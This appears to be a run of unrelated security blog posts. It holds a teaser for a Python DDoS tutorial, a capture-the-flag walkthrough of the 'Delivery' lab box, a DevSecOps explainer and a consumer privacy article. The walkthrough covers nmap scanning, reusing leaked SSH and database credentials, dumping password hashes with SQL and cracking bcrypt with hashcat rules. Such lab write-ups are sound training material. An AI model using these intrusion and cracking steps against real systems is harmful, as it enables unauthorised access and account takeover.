How to DDoS with Python. We setup a sever with vulnerability and create an exploit that we will script together. We use the python flask library or framework to create an API where you give it a Fibonacci number where we are programming in a recursive way to be vulnerable. Afterwords the real fun pentesting!
Delivery is an easy level box that is beginner friendly with assigned IP of 10.10.10.222. It requires creative thinking to solve it. It presents a helpdesk and a Mattermost instance. Creating ticket on helpdesk, mail is received to update the ticket that can be used to create Mattermost account. The Mattermost contains the important conversation disclosing SSH creds. These creds will be used to access the box and then privilege escalation will be done with some cool stuff.
First run nmap scan with following command
nmap -sV -sC -A -T4 -p- -oA nmap_scan 10.10.10.222
Go through the web service associated with this IP
On the front page, there’s a link associated with HELPDESK (helpdesk.delivery.htb) pointing to an account. So we make an entry to our /etc/hosts file as follows
Now we can directly open the website with http://delivery.htb
Also there’s a CONTACT US button and clicking on the button we are navigated to http://delivery.htb/#contact-us
Here we get the message that for unregistered users, use HelpDesk to contact the team. And once we have an @delivery.htb email address, we can access the MatterMost Server which is hosted on http://delivery.htb:8065
So far we have got following items of interest
- helpdesk (http://helpdesk.delivery.htb)
- We need to get an email address from here
- MatterMost Server (http://delivery.htb:8065)
Now we view page source and go through the code to find something of interest. First of all we check source code of front page
Here we see 2 article tags with IDs contact-us and elements. We have got the contact-us but there’s no navigation for element. So we go to http://delivery.htb/#elements and get the following page
Here interesting thing is the messaging form at the end, and here we get in placehohlders some values
- Name: Jane Doe
- Email: email@example.com
And submitting the form with data, it gave
405 Not Allowed error. Going through the source code for this revealed that this form was posting data to http://delivery.htb/# It seems like a rabbit hole
Now we go to http://helpdesk.delivery.htb and get the following page
Here we have following options available
- Sign in
- Open a New Ticket
- Check Ticket Status
So we first go to
Sign in option
As we don’t have an account, we register for an account
Upon registration, we get the following message
We put a dummy email here and don’t have any access to the email. So for the time being, we move to the next option available i.e. Create a New Ticket
After creating the ticket we get the following feedback message
It has given us a ticket ID: 4577798 and an interesting support email: firstname.lastname@example.org
Now we go to Check Ticket Status to see if we get anything
Here we get the form with 2 fields email and a ticket number. Put both inputs with the values we got from the Create Ticket feedback
We get Access Denied ☹️
Try putting the email address that we used for registration
Now, we get access to the Ticket Status dashboard (I created a new ticket with email: email@example.com, name: demo, phone: 1234567890, ext: 123)
After going around this portal, I found nothing.
Let’s go to MatterMost server and register for an account with delivery.htb email
As soon we create the account, we are given feedback that a verification email has been sent to the provided email
So we go back to the helpdesk and refresh the ticket thread and we get the verification link
We can see that the verification link is in the first line up to 3rd line. So we copy that link and navigate to it
The email has been verified. Now we login to the MatterMost Server using the credentials email: firstname.lastname@example.org, password: Demo@12345
We can join Internal Team, So we click that and we get the following page
It looks like a conversation going on.
There’s a message from root that
Credentials to the server are maildeliverer:Youve_G0t_Mail!
Also from nmap scan we know SSH is running on the system. So we try these credentials in SSH
- user: maildeliverer
- password: Youve_G0t_Mail!
Delivery – User Flag
We have got the initial access. We look for the user flag and get it as follows
Now for privilege escalation, we first check sudo permissions for this user
It looks like we don’t have any sudo permissions
Now we run linpeas
We get the following interesting items
- MatterMost is running and its path
- Mysql is running
- 3 users with console
- Sudo version potentially vulnerable
Now that we have all these items, we check sudo vulnerability, but unfortunately, it is not vulnerable
Then we check mattermost config file in /opt/mattermost/config/config.json and we find the SQL Settings as
Here we get the SQL credentials
- user: mmuser
- password: Crack_The_MM_Admin_PW
So we login to mysql with these credentials as follows
We have got access to the database
Now we check for root password if there’s any in it
First, we check all databases
Use mattermost db as follows
Show tables as
We have a table Users. So we write a query to list all users. The result was very jumbled up but the root user was found and the final query for the root user was
SELECT username, password FROM Users;
So we have the hash of root’s password as
Also from MatterMost dashboard conversation, the root user sent a message saying
It says to create a program to stop re-using the same password specially those variants of
PleaseSubscribe! and it may not be in rockyou but if hacker manages to get it, they may use hashcat rules to crack it
Cracking Password Hash
So we use hashcat rules to crack the hash. But before that we identify the hash type so that we may specify the hash mode in hashcat
Using hashid, we get to know that the hash is bcrypt.
Now in hashcat we need to provide mode for bcrypt so we find mode for bcrypt as
So 3200 is the mode for bcrypt. Now we put hash in hash.txt, PleaseSubscribe! in wordlist.txt and use the rule best64
So combining all this we get the following output
The password is PleaseSubscribe!21
Delivery – Root Flag
We use it to login to root user and get flag
DevSecOps is the process of integrating security amidst the development and operations. It emphasizes the fact that security is the shared responsibility throughout the entire product development life cycle. DevSecOps represents a culture where we strive to build products faster and safer and we detect and respond to security findings early in the process rather than doing that in a reactive manner.
What is DevSecOps?
Practically, DevSecOps is an art of integrating 3 pillars of software development life cycle that are:
To achieve this we introduce Continuous Integration and Continuous Deployment (CI/CD) pipelines in both staging and live production environments. Let’s take a look at each of the departments individually and see what role it plays in the software development lifecycle and how we can integrate it with other departments.
Creating a new software components and improving them and consequent updates is the main responsibility of this department, this includes but not limited to below:
- In house apps to support various operations
- APIs to support the integration between legacy and new systems
- Apps and softwares built by opensource technologies that basically helps accelerate the development process
Latest development styles are more based upon agile methodologies that prioritize continuous improvement rather than a sequential form of orthodox implementation in which we have to wait for one complete development to occur and then test for bugs.
Developing a really cool software is just one step of the process and the next and more important step is to ensure that it is deployed properly and all necessary requirements are met in order for this software to work properly.
Operations plays its role over their and helps to manage software functionalities across it’s life cycle:
- Performance Monitoring
- Logging & Monitoring
- Deploying New Infrastructure
- Maintaining infra for new releases
Security is another part of this methodology, which basically refers to securing the product essentially. It includes information security, application security and infrastructure security.
Earlier, the security testing role comes at the end of product lifecycle when it’s fully developed which is done by a completely different team from operations and development. This approach slows the overall development process and also impacts the reaction time whenever a security incident happens.
Additionally, security tools themselves have generally been siloed. Every application security considers that application, and frequently just at the source code of that application. This made it difficult for anybody to have an organization wide perspective of security concerns, or to comprehend security risks considering the production environment.
By making security an essential part of DevSecOps process, from beginning plan to final release, these three core components of software development lifecycle can be aligned.
Why DevSecOps is different?
Conventional software development approach is cascade approach in which each unit of development lifecycle i.e. development, operations and security work in silos with no mutual coordination and one process starts only after the previous one ends.
In many teams, cascade has to a great extent been supplanted by Agile strategy, in which a project is divided into multiple sprints. But in many organizations security testing is still being delayed and done after the development, just like cascade style! The delay caused in this process downgrades the productivity of developers and forces them to backtrack their development process, in order to fix security issues that come as a result of security testing.
DevSecOps, then again, empowers security testing to happen consistently and consequently in a similar general time period in which regular development and QA testing is going for a software product.
For instance, security tests can be done by engineers with the help of agile methodology of DevSecOps in the same time frame, when development is going on which saves times that gets loss in context switching when security tests are carried out after the development process.
DevSecOps Best Practices
We’ll discuss some of the building blocks of DevSecOps methodology and how we can implement them.
Secure Code Practice
The first and foremost thing is to educate developers in regards to basic security hygiene and provide them necessary learning opportunities where they can learn how to write a secure code. Secure coding creates a high resistance to the vulnerabilities in the very beginning, which saves a lot of effort and time if these vulnerabilities are discovered and patched at the completion of the product.Moreover, various IDE extensions can be provided to developers like snyk which can help developers detect vulnerabilities at the very beginning of the process.
Similar to DevOps, automation is the key in DevSecOps as well. In order to ensure that we are securing code in every push of your code repository, we need to make sure that we are using automation for security in CI/CD pipeline.
Various tools can be used to look for the potential security vulnerabilities in the code release, like Static Application Security Testing (SAST) tools which can scan and detect vulnerabilities at every push so that they are addressed early in the process of development.
Shift Left Approach
Unlike the cascade approach which we discussed earlier, where we have to wait for one process to end completely to start another. In the shift left approach we try to move and address the security concerns at the very beginning of the process during the development phase. It’s a win-win situation for both developers and security engineers as developers can fix the vulnerabilities with a lot less effort as compared to if they have to do so when a product is fully developed. And for security engineers, it helps in building a secure product from the beginning.
Common challenge with doing a left shift will be it can disrupt your ongoing DevOps processes, which can be uncomfortable in the beginning for everyone but adopting the shift left mentality is definitely something worth considering which will benefit your environment in so many pleasant ways.
To conclude, DevSecOps is the complete culture change within the organization. It requires active involvement and effort from each team including in the development process. Automation is the magic word here. Automate every process you can, whether deploying infrastructure as code (IaC), writing security unit tests or doing dynamic application scanning, automation is the key.
Educate and empower people to adopt modern ways of developing a secure product, give them all the necessary means which can help them learn secure coding and apply bake in security in the very beginning of the process.
The internet has transformed how we interact with various industries worldwide and changed how we do things. We can now do many things online, from banking to shopping and even medical appointments.
While the advent of the internet has brought about some welcomed change, it’s also created issues, particularly around cybersecurity and privacy for its users. Thanks to the pandemic, companies and organizations worldwide have demanded better connectivity as more people work from home. However, in 2021, cybercrime skyrocketed.
According to Check Point Research, organizations surveyed in their 2021 study were found to experience about 925 cyberattacks per week globally. While it’s unclear what caused these cyberattacks, human error and the lack of good password practices are often prominent suspects. After all, humans create at least 100 different accounts and passwords in their lifetime, so we often reuse our passwords out of convenience.
Password hygiene isn’t the only thing we tend to overlook when using the internet. In fact, there are plenty of different ways we often give up our data without really knowing or realizing it.
To help you better understand how our data is often at risk, we’ve created a list of the various types of technology and software we interact with almost daily that could store and distribute our data.
Social media is a great way to keep in touch with friends and family. However, not many people consider the type of information they’re giving up each time they post something on a platform. Whether it’s information about birthdays, employment history, and the like, we consistently give up more data than we think.
Cybersecurity experts encourage people to keep their social media profiles private and limit the information they share in their profiles’ “About Me” section to make it harder for hackers to piece together information about a victim.
Food delivery apps and services are known to leverage big data analytics to stay competitive and understand their customer’s preferences. Each time we order food or groceries from an app, we give these companies information on what we like and don’t. We’re also telling them how often we need certain items.
Food companies and other service providers can then sell this data to their vendors, leveraging this information by creating ads that target the customers they want.
Location information is something we often give up without realizing. Our phone is an absolute location beacon through navigation apps, the weather app, and social media platforms. This interactive New York Times article shows how easy it is to piece together location data about a person through an app on their smartphone. The app could track how long a person was at their doctor’s appointment, how far they went while hiking, and the address they stayed at overnight.
Like food delivery apps and services, streaming platforms like Netflix, Hulu, and Amazon Prime leverage user data to determine what programs and services users might like. These streaming providers can then market new series and films and target selected users.
Video conferring services like Zoom, Microsoft Teams, and Google Meets gained significant popularity during the pandemic. Zoom users grew from 10 million in December 2019 to over 300 million in April 2020.
While this is excellent news for Zoom, they’re also prime targets for cybercriminals and other malicious third parties. In April 2020 alone, multiple Zoom privacy issues and security breaches were reported, including a bug that made it easy for hackers to take control of a user’s microphone or webcam.
To protect yourself from potential hackers, always log off and close your video conferencing apps when they’re not in use. Make it a point also to cover your webcam when not in use. If you need to use your laptop’s webcam, you can purchase these small dedicated covers to shut them off.
Have you ever looked up a purse on an online catalog only to get served ads on a completely different website?
Here’s the thing, online shopping sites regularly track what users look at to remarket the product back to them, hoping that it’ll lead to a purchase.
For security enthusiasts, webcams can be suspicious pieces of equipment for a good reason. Webcams can be hacked easily, and hackers usually enjoy turning them on and recording their victims. Besides recording their victims, hackers may implant malware or viruses, preventing their victims from being able to use their webcams. Victims will then have to pay to get their webcams unlocked. To make matters worse, hackers can do all this remotely.
To prevent this, be careful of the browser extensions you’re downloading and limit the use of your webcam where possible.
Health apps like calorie counters, period prediction apps, and workout trackers are great for those who want to stay on top of their fitness game. However, these apps come with a slight caveat: they always track your data.
Period tracking apps have been coming under fire for allegedly selling their users’ data recently. While it might seem harmless, this information, when paired with input from other social media sites and internet footprints, might allow hackers to paint a better picture of their target and find ways to exploit them.
10. Review sites and forums
All it takes is for you to leave a review of a restaurant or write a comment on a forum to expose your interests and, potentially, your location. While reviews and comments can be helpful for others online, they can also reveal our whereabouts.
Now that you’re more aware of how your data could unknowingly be distributed, you’re on track to becoming a lot more careful. Unfortunately, as long as we have smartphones and employ smart gadgets, it’s impossible not to have a digital footprint of some sort. However, we can always take steps to safeguard our privacy and protect our personal information as best as possible.